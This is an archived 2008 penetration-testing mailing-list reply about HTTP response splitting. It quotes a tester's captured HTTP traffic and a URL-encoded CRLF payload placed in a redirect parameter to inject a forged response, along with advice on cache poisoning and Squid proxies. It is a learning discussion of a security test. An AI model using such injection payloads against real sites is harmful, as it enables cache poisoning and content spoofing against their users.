Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

pen-test logo Penetration Testing mailing list archives

Re: Is there a HTTP Respone Splitting Flaw?
From: "Gleb Paharenko" <gpaharenko () gmail com>
Date: Wed, 30 Apr 2008 10:42:39 +0300
Hi.

Service is vulnerable to http splitting in case it does not filter
control characters in the output. Spitting can be utilized in several
attack vectors and cache poisoning it only one of them. When I've been
researching the article of Amit Klein, I was able to easily reproduce
cache poisoning with apache, however failed with squid. My advice is
to emulate attack in lab environment and then try it in the wild. BTW:
fresh squid has some protection patches against cache poisoning.
Headers can be normalized by the upstream proxy, so you should be
aware of it. You can also cross post you question to more specific
webappsec mailing list.






2008/4/29  <bin4ry () theknetgroup org>:

Hi together,


 i'm new to this community as well as to pen-testing. I'v already done some jobs for smaller companies and 
it-infrastructures.


 Now i have to pen-test a website. I need  to perform a black-box-test and i've already found some xss- and some 
sql-injection-bugs which i've reported to the site admin.


 Now i believe that there's a http response splitting flaw as well.


 I found this suspicious ressource:




 foo.bar/accept?dest=/xy/z






 This looks like a redir-script, right? So this is what i get:




 GET foo.bar/accept?dest=/xy/z HTTP/1.1

 Host: foo.barUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3

 Accept-Encoding: gzip,deflate

 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

 Keep-Alive: 300

 Pragma: no-cache

 Proxy-Connection: keep-alive


 HTTP/1.x 302 Moved Temporarily <<<<<< look suspicious

 Via: A_PROXY

 Connection: close

 Proxy-Connection: close

 Date: Fri, 25 Apr 2008 12:09:42 GMT

 Location: foo.bar/xy/z <<<<<<<

 Content-Type: text/html; charset=utf-8

 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d

 Cache-Control: no-cache, private

 X-Runtime: 0.39293

 X-Powered-By: Servlet/2.4 JSP/2.0

 X-Cache: MISS from prx-deka-02.f.ddk

 ----------------------------------------------------------

 GET /xy/z HTTP/1.1 <<<<< thats it, right?

 Host: foo.bar

 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3

 Accept-Encoding: gzip,deflate

 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

 Keep-Alive: 300

 Proxy-Connection: keep-alive

 If-None-Match: "e7346ba9885de32fe8d51358b8a409af"


 HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy

 Via: A_PROXY

 Date: Fri, 25 Apr 2008 12:09:42 GMT

 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d

 Etag: "e7346ba9885de32fe8d51358b8a409af"

 Cache-Control: private, max-age=0, must-revalidate, private

 X-Cache: MISS from A_PROXY



 Till now evrything looks like a response splitting flaw. Thats why i pass this one to $dest:




 
/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E


 Which is:


 /xy/z


 HTTP/1.1 200 OK

 Content-Type: text/html

 Pragma: no-cache

 Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT

 Content-Length: 36

 <html>HTTP Response Splitting</html>




 So, again our http traffic now with a injected http header:





 GET 
/accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E
 HTTP/1.1

 Host: foo.bar

 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3

 Accept-Encoding: gzip,deflate

 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

 Keep-Alive: 300

 Pragma: no-cache

 Proxy-Connection: keep-alive


 HTTP/1.x 302 Moved Temporarily

 Via: A_PROXY

 Connection: close

 Proxy-Connection: close

 Date: Fri, 25 Apr 2008 12:07:47 GMT

 Location: foo.bar/de/xy/z

 Content-Type: text/html; charset=utf-8

 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d

 Cache-Control: no-cache, private

 X-Powered-By: Servlet/2.4 JSP/2.0

 X-Cache: MISS from A_PROXY

 ----------------------------------------------------------

 GET /xy/z HTTP/1.1

 Host: foo.bar

 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3

 Accept-Encoding: gzip,deflate

 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

 Keep-Alive: 300

 Proxy-Connection: keep-alive

 If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"


 HTTP/1.x 304 Not Modified

 Via: 1.0 A_PROXY

 Date: Fri, 25 Apr 2008 12:07:48 GMT

 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d

 Etag: "78ad90f3569fd7b31ad763f3f52e2c46"

 Cache-Control: private, max-age=0, must-revalidate, private

 X-Cache: MISS A_PROXY



 As u can see, the injected header won't be matched to the http-request from the redir-script.


 I tried several crlf-types: %0d%0a , %0a%0a and %0a but as we can see this is a linuxbox therefore %0d%0a should 
work.


 There's a squid between me and foo.bar. The whitepaper from sanctum sais that squid has a packet boundary approach 
and messages are read as packets and therefore injected headers may need 2 be padded.


 Someone can help me out?


 Thx


 P.S.: And another question. Since i am not really familiar with response splitting, i'd like to ask you whether the 
risc of response splitting is always present when a script utilizes user-input to form a new address which is the 
target of a rediriction script, which manifests in a http 302 header from the server?


 Thanks and greetings to the community from germany.

 ------------------------------------------------------------------------
 This list is sponsored by: Cenzic

 Need to secure your web apps NOW?
 Cenzic finds more, "real" vulnerabilities fast.
 Click to try it, buy it or download a solution FREE today!

 http://www.cenzic.com/downloads
 ------------------------------------------------------------------------






-- 
Best regards.
Gleb Pakharenko.
http://gpaharenko.livejournal.com

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]